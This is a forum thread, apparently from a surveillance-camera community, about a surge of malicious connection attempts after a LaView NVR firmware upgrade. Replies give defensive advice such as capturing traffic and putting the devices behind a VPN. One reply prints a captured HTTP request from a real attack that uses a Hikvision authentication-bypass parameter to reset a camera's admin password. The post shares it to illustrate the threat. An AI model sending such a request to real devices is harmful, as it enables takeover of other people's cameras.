LaView FW Security Flaw (LV-N9808C8E)

JonDC

n3wb
Joined
Sep 1, 2021
Messages
10
Reaction score
0
Location
USA
has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
7F4CA216-DD84-4B2A-8E28-86D3A100A321.jpeg7AF67ECF-AA1D-4D9E-A041-D607E16821C0.jpeg561DA6FA-C46F-4C3D-B9E0-A7A8AE8E4D5C.jpeg
 

alastairstevenson

Staff member
Joined
Oct 28, 2014
Messages
15,930
Reaction score
6,778
Location
Scotland
has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62?
An off-the-wall idea, that's most likely wrong (but stranger things have happened) :
Maybe there is an as-yet undisclosed and unpatched security vulnerability in that version of firmware where the catalogued population using that version is being specifically targeted with an attempted exploit.
I've seen that behaviour with specific Hikvision vulnerabilities.

Do you have the ability to capture the network traffic against the device, to see if the nature of some of the access attempts goes beyond the usual basic probe?
This would need something like a switch with a facility such as port replication to sniff the traffic.
 

alastairstevenson

Staff member
Joined
Oct 28, 2014
Messages
15,930
Reaction score
6,778
Location
Scotland
version of firmware where the catalogued population using that version is being specifically targeted with an attempted exploit.
Here is an example of an exposed Hikvision IP camera being hacked by the use of a serious firmware vulnerability.
In this case, it was just the admin password that was changed, as opposed to the device being bricked.
Code:
1656    2937.222673853    47.214.172.52    192.168.1.90    HTTP/XML    339    PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1

PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1
Content-Type: application/xml
Content-Length: 141
Host: xxx.180.45.xxx
Connection: close

<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema"><id>1</id><userName>admin</userName><password>asdf1234</password></User>
 

mikeynags

Known around here
Joined
Mar 14, 2017
Messages
1,034
Reaction score
939
Location
CT
has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
View attachment 100804View attachment 100805View attachment 100806
What type of firewall is this thing behind? Or do you have it directly connected to the Internet?
 

alastairstevenson

Staff member
Joined
Oct 28, 2014
Messages
15,930
Reaction score
6,778
Location
Scotland
What type of firewall is this thing behind?
A google search suggests it's an Xfinity device.
Presumably it's not just commenting on what's hitting the gateway itself - that's practically continuous.
There may well be port forwarding configured to the device the logs are referencing.

 

iwanttosee

Pulling my weight
Joined
Dec 27, 2020
Messages
203
Reaction score
186
Location
US
has anyone experienced a massive upswing in malicious IPs when upgrading to v3.4.62? I had been on v3.3.1 for the past few years without any security issues. Upgraded two days ago from their official FW site then hit with a barrage of malicious IPs pretty much across the globe (RUS, UKR, GER, ROM, USA, DEN, SWE) starting at midnight and running for 9 hours, then repeating again today. Can’t downgrade after talking with LaView, they won’t patch any existing security flaws in v3.4.62, and won’t release v3.4.93 or higher. Thoughts?
View attachment 100804View attachment 100805View attachment 100806
Cut off internet access to the NVR and Cameras. If you need to access it remotely, use OpenVPN.
 
Top